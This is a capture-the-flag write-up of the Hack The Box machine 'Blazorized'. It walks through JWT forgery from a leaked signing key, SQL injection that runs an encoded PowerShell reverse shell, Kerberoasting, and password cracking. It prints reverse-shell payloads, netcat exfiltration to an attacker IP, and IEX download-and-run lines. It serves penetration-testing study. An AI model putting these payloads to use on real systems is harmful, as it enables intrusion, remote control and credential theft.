Blazorized
Recon
└─$ grep bla /etc/hosts
10.10.11.22 blazorized.htb admin.blazorized.htb api.blazorized.htbHTTP (80)
Since dns exists I first did DNS enumeration:
└─$ domain="blazorized.htb"; ffuf -u "http://$domain" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fl 2
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://blazorized.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.blazorized.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response lines: 2
________________________________________________
admin [Status: 200, Size: 2037, Words: 149, Lines: 28, Duration: 160ms]
:: Progress: [19966/19966] :: Job [1/1] :: 428 req/sec :: Duration: [0:02:05] :: Errors: 0 ::The Check for Updates page makes request to api subdomain
In the API request we see an Authorization Token, but we are not yet logged in.
Nice, we have superadmin session token
Blazor DLLs
I tried using token to login into the admin panel but was unlucky. If we look at traffic when visiting admin subdomain some odd requests are made. Backend seems to be based on .NET C#... Yeap!Blazor is a free and open-source web framework that enables developers to create web user interfaces based on components, using C# and HTML. It is being developed by Microsoft, as part of the ASP.NET Core web app framework. Wikipedia
App is built with wasm and Blazor. If you visit the website for the first time you'll notice it's saying Loading, but that's fine nothing unusual. But if you're monitoring the traffic you see a lot of interesting things!
Reference: Just Blazor Programming: Hack A Blazor WASM App
Copy the dll endpoint links into endpoints_burp.log and download all of them.
└─$ ccd dlls; for dll in $(cat ../endpoints_burp.log | cut -f4); do url="http://blazorized.htb/$dll"; curl -LO "$url"; done;Leaked JWT Secret
We don't need System.* or Microsoft.* dll so we can skip them. Usually we need projectname.*. The Helpers dll reveals information about JWT signing and we have a key.
8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a
Code which created admin token:
public static string GenerateSuperAdminJWT(long expirationDurationInSeconds = 60L)
{
//IL_0063: Unknown result type (might be due to invalid IL or missing references)
//IL_0069: Expected O, but got Unknown
//IL_0069: Unknown result type (might be due to invalid IL or missing references)
try
{
List<Claim> list = new List<Claim>
{
new Claim("http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress", superAdminEmailClaimValue),
new Claim("http://schemas.microsoft.com/ws/2008/06/identity/claims/role", superAdminRoleClaimValue)
};
string text = issuer;
string text2 = adminDashboardAudience;
SigningCredentials signingCredentials = GetSigningCredentials();
DateTime? dateTime = DateTime.UtcNow.AddSeconds(expirationDurationInSeconds);
JwtSecurityToken val = new JwtSecurityToken(text, text2, (IEnumerable<Claim>)list, (DateTime?)null, dateTime, signingCredentials);
return ((SecurityTokenHandler)new JwtSecurityTokenHandler()).WriteToken((SecurityToken)(object)val);
}
catch (Exception)
{
throw;
}
}Forge the token:
eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJleHAiOjE3Mzk5MjUxMzAsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYWRtaW4uYmxhem9yaXplZC5odGIifQ.abD8mXBx16TPSoArZO3uZRX1aNmrqjdknvElGz0CD9iZmE9O9voA1DxE1AIRhrSLUelcyLjZswOh7oGac1SvLAThe admin subdomain first tries to authenticate by JWT Token. There was LocalStorage dll so it must be taking value from that. After a lot of fuzzing jwt was the key it used for auth...
Admin Panel
SQLi
Testing for SQL injection we get True or False, so Blind Injection.
In the nmap scan we saw MSSQL used, it allows Command Execution:
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';Verify if we can execute commands:
uwu'; EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwAyACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -- - Reverse Shell (nu_1055)
PS C:\Windows\system32> whoami /all
User Name SID
================== =============================================
blazorized\nu_1055 S-1-5-21-2039403211-964143010-2924010611-1117
Group Name Type SID Attributes
=========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Normal_Users Group S-1-5-21-2039403211-964143010-2924010611-1133 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Kerberos support for Dynamic Access Control on this device has been disabled.User.txt
PS C:\users\nu_1055> cat desktop/user.txt
107b582695337abf5d14a086491ef9ccPrivilege Escalation (RSA_4810)
└─$ villain -x 6502
┬ ┬ ┬ ┬ ┬ ┌─┐ ┬ ┌┐┌
└┐┌┘ │ │ │ ├─┤ │ │││
└┘ ┴ ┴─┘┴─┘┴ ┴ ┴ ┘└┘
Unleashed
[Meta] Created by t3l3machus
[Meta] Follow on Twitter, HTB, GitHub: @t3l3machus
[Meta] Thank you!
[Info] Initializing required services:
[0.0.0.0:6501]::Team Server
[0.0.0.0:4443]::Netcat TCP Multi-Handler
[0.0.0.0:6502]::HoaxShell Multi-Handler
[0.0.0.0:8888]::HTTP File Smuggler
[Info] Welcome! Type "help" to list available commands.
Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=tun0
Generating backdoor payload...
Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Object System.Net.Sockets.TCPClient('10.10.16.72',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -WindowStyle Hidden
Copied to clipboard!
[Shell] Backdoor session established on 10.10.11.22
Villain > backdoors
Session ID IP Address Shell Listener Stability Status
-------------------- ----------- -------------- -------- --------- ------
964cbe-c46f05-8d6a5a 10.10.11.22 powershell.exe netcat Stable Active
PS C:\users\public> upload /opt/scripts/enum/winPEASx64.exe C:\users\public\wp.exe
Success!
PS C:\users\public> .\wp.exe | tee-object -filepath wp.log
PS C:\users\nu_1055> systeminfo
Host Name: DC1
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA656
Original Install Date: 1/8/2024, 1:09:13 PM
System Boot Time: 7/2/2024, 5:37:39 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 826 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 1,064 MB
Virtual Memory: In Use: 3,735 MB
Page File Location(s): C:\pagefile.sys
Domain: blazorized.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.22
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\windows\panther> cat unattend.xml
...
<component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<UserAccounts>
<AdministratorPassword>*SENSITIVE*DATA*DELETED*</AdministratorPassword>
</UserAccounts>
...
web.config files also had nothing.
We are part of custom group so It's worth enumerating Groups.
BLAZORIZED\nu_1055> upload ./SharpHound.exe SH.exe
BLAZORIZED\nu_1055> .\SH.exe -c all --zipfilename sh.zip --zippassword 'Password123$'
BLAZORIZED\nu_1055> ls
Directory: C:\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/6/2021 3:38 PM Documents
d-r--- 9/15/2018 2:19 AM Downloads
d----- 7/2/2024 11:23 AM loot
d-r--- 9/15/2018 2:19 AM Music
d-r--- 9/15/2018 2:19 AM Pictures
d-r--- 9/15/2018 2:19 AM Videos
-a---- 7/2/2024 11:37 AM 23459 20240702113738_sh.zip
-a---- 7/2/2024 11:34 AM 1342464 SH.exe
-a---- 7/2/2024 9:37 AM 2387456 wp.exe
-a---- 7/2/2024 9:41 AM 598234 wp.log
-a---- 7/2/2024 11:37 AM 46015 ZWY3N2UxMzgtNTg0Zi00OTg1LTllNmQtMDg1Yjc5ZmYzNWMz.bin
BLAZORIZED\nu_1055> upload nc64.exe nc.exe
BLAZORIZED\nu_1055> cat 20240702113738_sh.zip | ./nc.exe 10.10.16.72 4444Exfiltrate the zip
As I thought, the exfiltration was not successful because of piping zip directly to nc. To bypass this we can encode the file using Base64, easiest way being certutil.exe
BLAZORIZED\nu_1055> certutil.exe -encode 20240702115628_sh.zip sh.zip.base64
Input Length = 22554
Output Length = 31068
CertUtil: -encode command completed successfully.
BLAZORIZED\nu_1055> cat sh.zip.base64 | ./nc.exe 10.10.16.72 4444
---
└─$ cat loot.zip.base64 | base64 -di > loot.zip
└─$ file loot.zip
loot.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
└─$ unzip loot.zip
Archive: loot.zip
inflating: 20240702115628_computers.json
inflating: 20240702115628_users.json
inflating: 20240702115628_groups.json
inflating: 20240702115628_containers.json
inflating: 20240702115628_domains.json
inflating: 20240702115628_gpos.json
inflating: 20240702115628_ous.jsonNote:
certutil.exeis used for certificates, make sure to remove First and Last line for valid Base64!
Note: I removed the password for Base64.
Unfortunately the Bloodhound app cannot digest the collected information because of Sharphound 5.x BloodHoundAD: Zip File not loading #700 Community Edition Bloodhound is required for setup: https://github.com/SpecterOps/BloodHound
sudo apt install docker-compose
curl -L https://ghst.ly/getbhce | docker-compose -f - up # docker-compose (With dash on kali)BloodHound
Owned user is part of following groups
We have Outbound Object Control: WriteSPN on RSA_4810 account.
The user NU_1055@BLAZORIZED.HTB has the ability to write to the "serviceprincipalname" attribute to the user RSA_4810@BLAZORIZED.HTB.
If we click on WriteSPN we get some juicy details!
TheHackerRecipies > DACL abuse > BloodHound ACE edgesTheHackerRecipies > DACL abuse > BloodHound ACE edges > Targeted Kerberoasting
BLAZORIZED\nu_1055> IEX(IWR 10.10.16.72/PowerView.ps1 -UseBasicParsing)
BLAZORIZED\nu_1055> Get-DomainUser 'RSA_4810' | Select serviceprincipalname
serviceprincipalname
--------------------
blazorized.htb/admin
BLAZORIZED\nu_1055> Set-DomainObject -Identity 'RSA_4810' -Set @{serviceprincipalname='daddy/issues'}
BLAZORIZED\nu_1055> $User = Get-DomainUser 'RSA_4810'
BLAZORIZED\nu_1055> $User | Get-DomainSPNTicket | fl
SamAccountName : RSA_4810
DistinguishedName : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
ServicePrincipalName : daddy/issues
TicketByteHexStream :
Hash : $krb5tgs$23$*RSA_4810$blazorized.htb$daddy/issues*$1461290852DF10FFC82979557447F05D$FD1FBC62FF7E
832711A0234D5F4770C5B0A2F2E2C794756830E2C38395AE315B83CC2E1F93780C720CB9A5D6DFEDFFA00EB1153E8408
0AD3D8B6CCF256615B7FCB8F690F6167017EB566377523CE831EF570AA625CEB6E219BE521A842F1A0F11B56363BEA4B
64C7F811213432BA1D90E5242E49BB51FB565CED56BB9C1BFE2FB3F717E60CB8C6AA178C23310A2278BF6EEB56797960
343B99A7E9332A4A9DAB60086091A0EBF9EB9EC9826A77121FCAE45B854CA7C842532AD932CB2AD3679563D32B30E714
3A65EBB76CB933A6CBB56657F9E8C7676349611F93DB5EA24F177ADDD1BFC24757674CF44890D172121AB6B46EA71757
CEA570A391427741AABE1CD598BBD489E0FB570E0D22F324E1A8B48DFC648C2886707A97C96894E7F799EB588D5B75F9
A3CF130E85086B3C514C2BFB33183DDF9D43AFA378E6A280C9AA14FC45F2D0A28250CD3C090BF4924F408B940C675EA0
6F8B5F7671D1A7798F8AE53EC57564D71EFCDF9EA03820550EE755E8FF80A83DDD901238A36BFE19DD04452365E91412
B2EADAEB5F706B58AE51ACF59A9BDC7FBDEE8EAB170E97468F64D175559F54DB7AB4026854A122E5E813B10160C0FD59
E3EA65EE9F3DFFABF71F4212A9C96A2A0EB6987B589D6119A1DC6D31A1C663D3D86B78CD921BCA55B1BEA821C0C8D03F
2F9E084D8AA855474C758C6F67B5BE7B469A0086196EEA4B8685B489A9A1933B268471CCC966AAF7480EA62330985589
5E20EEBBDF0362A23FDCEA926C45A238DBF92473E5EDE7FD24D391C1124316216101ADFA185DF64A900CBD1812749BFC
FB64287D5A76E7AF24500DE5F95FD05416307BD17306912A9E5CD3DE857EFD2557EFBE8E6AEFE0462355A94BD934FB76
63629A8F9C11F0F163CDE8854802DB24FBF6BD3C57D1CC5DE0243679B4AB1C4F782C266E5E7C1BAF20388A9D066BDED6
F5B5107774A8599BE4936AE5F5892F4F6B745B333D2E10CA180686F3111C59FC0CA226AE715299A7875CEFA5107E8460
6961EA247769A93A330A66617B2F7C7298C9E1F4C7C4B018AFB3AD551BCA6964C52BEB4A436B448B1B0A4A23FECDFA0E
BA30F40F223ABF12FAF58941D6F859AD7BB01316F75BAD06D313ACAC11FB147B96D50A6643060FFCAD6DEC655503B2FD
C012728FBE0D1D04158A29F40D82C6AD7B48534C11052DBFC381478A9855BB16C3F9B2D66E4788A3365DBDBC3C3C8410
29CB8C7D47EFD832BB28AF2B85F0651010169A5734D370C70EE6DB52ABB11AD16D8A6F02B276A21D2CF3DC00AD62D65E
CC8C1150EE146D214BAB803BBF376239702FA9F6E8D9EB0EB1E38DD5C934AC6B4BD9DC1089631468CBE0B7234051E4AA
C5C8AB3714122A73E94D66B5CB720F7ABA84B73404DEDDB88E00FF3F326F06F3168E10B49B968E7C1A235F0C3F0B58BD
0C6A9CB4648F21C00B5BB7CA94BC3FBFC67EC6EE16F4A818B8C6C0D53FFF292B00034F1F99DA78B4D8C548DD07E84754
B125E9D5015490201DF68400BA56E5CD23FC8A536BB3275B67E15075CB4DEA72C7EA185AB76695C7EC27CBF5E1B7DEB5
5C7B3ECBC19D31C74AE3ACD3831C45AB015E2C67DF6FB86FE07DF55C9C305729B676410A4133A152809872FF208E39FD
80E531F82ED3E3635DB598E468F5EC10ACBE2CCFEAA51E845C896749980CF19F0A896B8FD6FE27B7E9E372C3CC088258
5D7333572D66A30B0118D967CBBE8421947891422C56D13F389FEE5EA4B5CA59B1D30EC3A9C879411BCEEEE79BFD2638
0BFA
BLAZORIZED\nu_1055> $User Set-DomainObject -Identity 'RSA_4810' -Clear serviceprincipalname➜ .\hashcat.exe --show hashes
...
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
...
➜ .\hashcat.exe -a 0 -m 13100 .\hashes .\rockyou.txt
...
$krb5tgs$23$*RSA_4810$blazorized.htb$daddy/issues*$1461290852df10ffc82979557447f05d$fd1fbc62ff7e832711a0234d5f4770c5b0a2f2e2c794756830e2c38395ae315b83cc2e1f93780c720cb9a5d6dfedffa00eb1153e84080ad3d8b6ccf256615b7fcb8f690f6167017eb566377523ce831ef570aa625ceb6e219be521a842f1a0f11b56363bea4b64c7f811213432ba1d90e5242e49bb51fb565ced56bb9c1bfe2fb3f717e60cb8c6aa178c23310a2278bf6eeb56797960343b99a7e9332a4a9dab60086091a0ebf9eb9ec9826a77121fcae45b854ca7c842532ad932cb2ad3679563d32b30e7143a65ebb76cb933a6cbb56657f9e8c7676349611f93db5ea24f177addd1bfc24757674cf44890d172121ab6b46ea71757cea570a391427741aabe1cd598bbd489e0fb570e0d22f324e1a8b48dfc648c2886707a97c96894e7f799eb588d5b75f9a3cf130e85086b3c514c2bfb33183ddf9d43afa378e6a280c9aa14fc45f2d0a28250cd3c090bf4924f408b940c675ea06f8b5f7671d1a7798f8ae53ec57564d71efcdf9ea03820550ee755e8ff80a83ddd901238a36bfe19dd04452365e91412b2eadaeb5f706b58ae51acf59a9bdc7fbdee8eab170e97468f64d175559f54db7ab4026854a122e5e813b10160c0fd59e3ea65ee9f3dffabf71f4212a9c96a2a0eb6987b589d6119a1dc6d31a1c663d3d86b78cd921bca55b1bea821c0c8d03f2f9e084d8aa855474c758c6f67b5be7b469a0086196eea4b8685b489a9a1933b268471ccc966aaf7480ea623309855895e20eebbdf0362a23fdcea926c45a238dbf92473e5ede7fd24d391c1124316216101adfa185df64a900cbd1812749bfcfb64287d5a76e7af24500de5f95fd05416307bd17306912a9e5cd3de857efd2557efbe8e6aefe0462355a94bd934fb7663629a8f9c11f0f163cde8854802db24fbf6bd3c57d1cc5de0243679b4ab1c4f782c266e5e7c1baf20388a9d066bded6f5b5107774a8599be4936ae5f5892f4f6b745b333d2e10ca180686f3111c59fc0ca226ae715299a7875cefa5107e84606961ea247769a93a330a66617b2f7c7298c9e1f4c7c4b018afb3ad551bca6964c52beb4a436b448b1b0a4a23fecdfa0eba30f40f223abf12faf58941d6f859ad7bb01316f75bad06d313acac11fb147b96d50a6643060ffcad6dec655503b2fdc012728fbe0d1d04158a29f40d82c6ad7b48534c11052dbfc381478a9855bb16c3f9b2d66e4788a3365dbdbc3c3c841029cb8c7d47efd832bb28af2b85f0651010169a5734d370c70ee6db52abb11ad16d8a6f02b276a21d2cf3dc00ad62d65ecc8c1150ee146d214bab803bbf376239702fa9f6e8d9eb0eb1e38dd5c934ac6b4bd9dc1089631468cbe0b7234051e4aac5c8ab3714122a73e94d66b5cb720f7aba84b73404deddb88e00ff3f326f06f3168e10b49b968e7c1a235f0c3f0b58bd0c6a9cb4648f21c00b5bb7ca94bc3fbfc67ec6ee16f4a818b8c6c0d53fff292b00034f1f99da78b4d8c548dd07e84754b125e9d5015490201df68400ba56e5cd23fc8a536bb3275b67e15075cb4dea72c7ea185ab76695c7ec27cbf5e1b7deb55c7b3ecbc19d31c74ae3acd3831c45ab015e2c67df6fb86fe07df55c9c305729b676410a4133a152809872ff208e39fd80e531f82ed3e3635db598e468f5ec10acbe2ccfeaa51e845c896749980cf19f0a896b8fd6fe27b7e9e372c3cc0882585d7333572d66a30b0118d967cbbe8421947891422c56d13f389fee5ea4b5ca59b1d30ec3a9c879411bceeee79bfd26380bfa:(Ni7856Do9854Ki05Ng0005 #)
...Creds:
RSA_4810:(Ni7856Do9854Ki05Ng0005 #)
Privilege Escalation (SSA_6010)
└─$ evil-winrm -i 10.10.11.22 -u 'RSA_4810' -p '(Ni7856Do9854Ki05Ng0005 #)'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami /all
User Name SID
=================== =============================================
blazorized\rsa_4810 S-1-5-21-2039403211-964143010-2924010611-1107
Group Name Type SID Attributes
=========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Remote_Support_Administrators Group S-1-5-21-2039403211-964143010-2924010611-1115 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\users\public> .\SH.exe -c all --zipfilename sh.zip --zippassword 'Password123$'
*Evil-WinRM* PS C:\users\public> download 20240702141848_sh.zip
The Bloodhound doesn't give any more information about PrivEsc. Upload PowerView and explore system manually.
*Evil-WinRM* PS C:\users\public> IEX(IWR 10.10.16.72/PowerView.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\users\public> Get-DomainUser | Select displayname, logoncount
displayname logoncount
----------- ----------
565
0
0
RSA_4810 24
NU_1056 0
0
NU_1058 0
NU_1055 199
RSA_4811 2
RSA_4812 0
RSA_4813 0
RSA_4814 0
SSA_6010 3984
SSA_6011 0
SSA_6012 0
SSA_6013 0
LSA_3211 0
LSA_3212 0
LSA_3213 0After invoking Get-DomainUser and looking over the result one field stands out, logoncount. 3984 logon time seems line an automated task.
*Evil-WinRM* PS C:\users\public> Get-DomainUser -Identity SSA_6010
logoncount : 3988
badpasswordtime : 6/19/2024 9:58:18 AM
distinguishedname : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : SSA_6010
lastlogontimestamp : 6/27/2024 7:18:21 AM
userprincipalname : SSA_6010@blazorized.htb
name : SSA_6010
objectsid : S-1-5-21-2039403211-964143010-2924010611-1124
samaccountname : SSA_6010
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/2/2024 6:40:52 PM
instancetype : 4
usncreated : 29007
objectguid : 8bf3166b-e716-4f91-946c-174e1fb433ed
lastlogoff : 12/31/1600 6:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {6/19/2024 1:24:50 PM, 6/14/2024 12:40:41 PM, 6/14/2024 12:40:28 PM, 6/14/2024 12:38:20 PM...}
memberof : {CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon : 7/2/2024 3:06:09 PM
cn : SSA_6010
badpwdcount : 0
scriptpath : \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 1/10/2024 2:32:00 PM
primarygroupid : 513
pwdlastset : 2/25/2024 11:56:55 AM
usnchanged : 345421
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> Get-SmbShare
Name ScopeName Path Description
---- --------- ---- -----------
ADMIN$ * Remote Admin
C$ * Default share
IPC$ * Remote IPC
NETLOGON * Logon server share
SYSVOL * Logon server share
*Evil-WinRM* PS C:\windows\sysvol> ls -Recurse -Filter '02FCE0D1303F.bat' -ErrorAction SilentlyContinue
Directory: C:\windows\sysvol\domain\scripts\A32FF3AEAA23
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/3/2024 8:56 AM 178 02FCE0D1303F.bat
Directory: C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/3/2024 8:56 AM 178 02FCE0D1303F.batLogon scripts are usually found in C:\WINDOWS\SYSVOL\domain\scripts src
Logon Script
Check what's in the logon scripts directory:
*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF> cat 2C0A3DFE2030.bat
:: TO-DO: Notify LSA_3214 to write the logonScript for SSA_6010Get permissions:
*Evil-WinRM* PS C:\windows\sysvol> $acl = Get-Acl C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
*Evil-WinRM* PS C:\windows\sysvol> foreach ($property in $acl.PSObject.Properties) {
Write-Output "$($property.Name): $($property.Value)"
}
